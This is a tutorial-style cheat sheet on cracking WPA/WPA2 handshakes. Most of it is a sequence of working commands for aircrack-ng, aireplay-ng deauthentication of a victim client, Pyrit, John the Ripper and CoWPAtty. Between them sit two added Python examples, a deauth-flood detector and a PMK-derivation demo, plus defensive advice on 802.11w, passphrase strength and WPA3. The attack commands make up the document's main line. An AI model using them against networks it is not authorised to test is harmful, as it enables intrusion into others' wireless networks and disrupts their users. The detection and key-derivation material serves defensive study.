Cracking a WPA handshake nowadays can be easy or can take an eternity; here I will explain the tools and techniques used by professionals.
Capture WPA Handshake
airmon-ng start <INTERFACE> <channel>
airodump-ng -c <CHANNEL> --bssid <BSSID> -w <FILENAME> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon
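The aireplay-ng -0 line above works by sending deauthentication frames so that the client reconnects and airodump-ng can record the handshake. That burst of management frames is exactly what a wireless IDS watches for, so the defensive counterpart of this step is a deauth-flood detector. The following is an added example, not code from the aircrack-ng suite or from this page: a sliding-window detector run over a constructed list of frame records (the field names ts, subtype, src, dst and bssid and the MAC addresses are assumptions for illustration; a real sensor would fill them from monitor-mode captures).

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management-frame records, in the shape a
# monitor-mode sensor might log them: timestamp in seconds, frame subtype,
# source, destination and BSSID. All addresses are made-up placeholders.
AP = "AA:BB:CC:00:00:01"
CLIENT_X = "DE:AD:BE:EF:00:10"
CLIENT_Y = "DE:AD:BE:EF:00:20"
BROADCAST = "FF:FF:FF:FF:FF:FF"

SAMPLE_FRAMES = [
    {"ts": 0.0, "subtype": "beacon", "src": AP, "dst": BROADCAST, "bssid": AP},
    # a single deauth, as an AP legitimately sends when a client idles out
    {"ts": 0.5, "subtype": "deauth", "src": AP, "dst": CLIENT_X, "bssid": AP},
    {"ts": 1.0, "subtype": "data", "src": CLIENT_Y, "dst": AP, "bssid": AP},
]
# a burst of eight deauth frames to one client within 0.7 s (forged source)
SAMPLE_FRAMES += [
    {"ts": ts, "subtype": "deauth", "src": AP, "dst": CLIENT_Y, "bssid": AP}
    for ts in (10.0, 10.1, 10.2, 10.3, 10.4, 10.5, 10.6, 10.7)
]
# three broadcast deauths: suspicious, but below the default threshold used here
SAMPLE_FRAMES += [
    {"ts": ts, "subtype": "deauth", "src": AP, "dst": BROADCAST, "bssid": AP}
    for ts in (20.0, 20.1, 20.2)
]

DEAUTH_SUBTYPES = {"deauth", "disassoc"}


def detect_deauth_floods(frames, threshold=5, window=2.0):
    """Return one alert per (bssid, target) pair that receives at least
    `threshold` deauth/disassoc frames inside any `window`-second span.
    The alert is emitted the moment the threshold is first crossed."""
    recent = defaultdict(deque)   # (bssid, target) -> timestamps still in window
    alerted = set()
    alerts = []
    for frame in sorted(frames, key=lambda f: f["ts"]):
        if frame["subtype"] not in DEAUTH_SUBTYPES:
            continue
        key = (frame["bssid"], frame["dst"])
        times = recent[key]
        times.append(frame["ts"])
        # drop timestamps that have fallen out of the sliding window
        while times and frame["ts"] - times[0] > window:
            times.popleft()
        if len(times) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "bssid": key[0],
                "target": key[1],
                "count": len(times),
                "first_ts": times[0],
                "last_ts": frame["ts"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        span = alert["last_ts"] - alert["first_ts"]
        print(f"deauth flood on {alert['bssid']} against {alert['target']}: "
              f"{alert['count']} frames in {span:.1f}s")
```

The threshold and window are tuning knobs: a single deauth per client is normal AP housekeeping, while several within a couple of seconds almost never are. Detection only tells you it happened; the mitigation is Protected Management Frames (802.11w), under which a station discards deauthentication frames that are not integrity-protected, so a forged burst no longer forces the reconnection the capture relies on.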
Crack WPA Handshake Methods
Dictionary mode
Cracking WPA handshakes with a wordlist is the most common procedure.
aircrack-ng -w <WORDLIST> <.CAP FILENAME>
Database mode
aircrack-ng -r <DB NAME> <.CAP FILENAME>
Cracking WPA with Pyrit
airmon-ng start <INTERFACE> <CHANNEL>
pyrit -r <INTERFACE> -o <FILENAME> stripLive
aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon
Dictionary mode
pyrit -r <.CAP FILENAME> -i <WORDLIST> -b <BSSID> attack_passthrough
Database mode
pyrit -i <WORDLIST> import_passwords
pyrit -e <ESSID> create_essid
pyrit batch
pyrit -r <.CAP FILENAME> -b <BSSID> attack_db
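Both database modes on this page (aircrack-ng -r with an airolib-ng database, and pyrit batch followed by attack_db) work for the same reason: the expensive step of WPA/WPA2-PSK is deriving the pairwise master key, and that derivation depends only on the passphrase and the ESSID, so it can be computed once per ESSID and reused for every capture of that network (which is why Pyrit needs create_essid before batch). The following is an added example, not code from aircrack-ng, airolib-ng or Pyrit: it derives the PMK with Python's standard library, re-implements the PBKDF2 loop so the cost (two SHA-1 HMAC chains of 4096 iterations per candidate) is visible, and shows that the same passphrase gives an unrelated PMK under a different ESSID. The known-answer vector used in the self-check is the one published in IEEE 802.11i Annex H (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac
import struct

PBKDF2_ITERATIONS = 4096   # fixed by the WPA-PSK specification
PMK_LENGTH = 32            # 256-bit pairwise master key


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the network name (ESSID), 4096 iterations, 32-byte output.
    Only these two inputs matter, which is what makes per-ESSID tables possible."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS,
                               dklen=PMK_LENGTH)


def pbkdf2_sha1_manual(password: bytes, salt: bytes, iterations: int, dklen: int) -> bytes:
    """Textbook PBKDF2 (RFC 2898) with HMAC-SHA1, written out to show the work.
    Each 20-byte output block costs `iterations` HMAC calls; a 32-byte PMK needs
    two blocks, so one passphrase candidate costs 8192 HMAC-SHA1 computations."""
    out = b""
    block_index = 1
    while len(out) < dklen:
        u = hmac.new(password, salt + struct.pack(">I", block_index), hashlib.sha1).digest()
        t = bytearray(u)
        for _ in range(iterations - 1):
            u = hmac.new(password, u, hashlib.sha1).digest()
            for i in range(len(t)):
                t[i] ^= u[i]
        out += bytes(t)
        block_index += 1
    return out[:dklen]


def hmac_calls_per_candidate(dklen: int = PMK_LENGTH, iterations: int = PBKDF2_ITERATIONS) -> int:
    """Number of HMAC-SHA1 evaluations PBKDF2 spends on one candidate passphrase."""
    blocks = -(-dklen // hashlib.sha1().digest_size)   # ceiling division
    return blocks * iterations


def essid_changes_pmk(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when the two network names give different PMKs for the same
    passphrase, i.e. a table built for essid_a is useless against essid_b."""
    return derive_pmk(passphrase, essid_a) != derive_pmk(passphrase, essid_b)


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")
    print("PMK(password, IEEE) =", pmk.hex())
    print("manual PBKDF2 agrees:",
          pbkdf2_sha1_manual(b"password", b"IEEE", PBKDF2_ITERATIONS, PMK_LENGTH) == pmk)
    print("HMAC-SHA1 calls per candidate:", hmac_calls_per_candidate())
    print("ESSID 'IEEE' vs 'ieee' give different PMKs:",
          essid_changes_pmk("password", "IEEE", "ieee"))
```

Two defensive conclusions follow directly from the derivation. First, the 8192 HMAC computations per candidate are the only thing slowing a dictionary attack down, so the passphrase must not be in any wordlist: its length and randomness, not the PBKDF2 cost, decide whether the handshake is crackable. Second, the ESSID acts as a salt, so a network that keeps a vendor default name is exposed to tables precomputed once for that name, while a unique name forces the attacker to start from scratch. WPA3-SAE removes the offline dictionary attack on the handshake altogether, which is the real fix.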
Cracking WPA with John the Ripper (JTR)
./john --wordlist=<WORDLIST> --rules --stdout | aircrack-ng -e <ESSID> -w - <.CAP FILENAME>
Cracking WPA with CoWPAtty
cowpatty -r <.CAP FILENAME> -f <WORDLIST> -s <ESSID>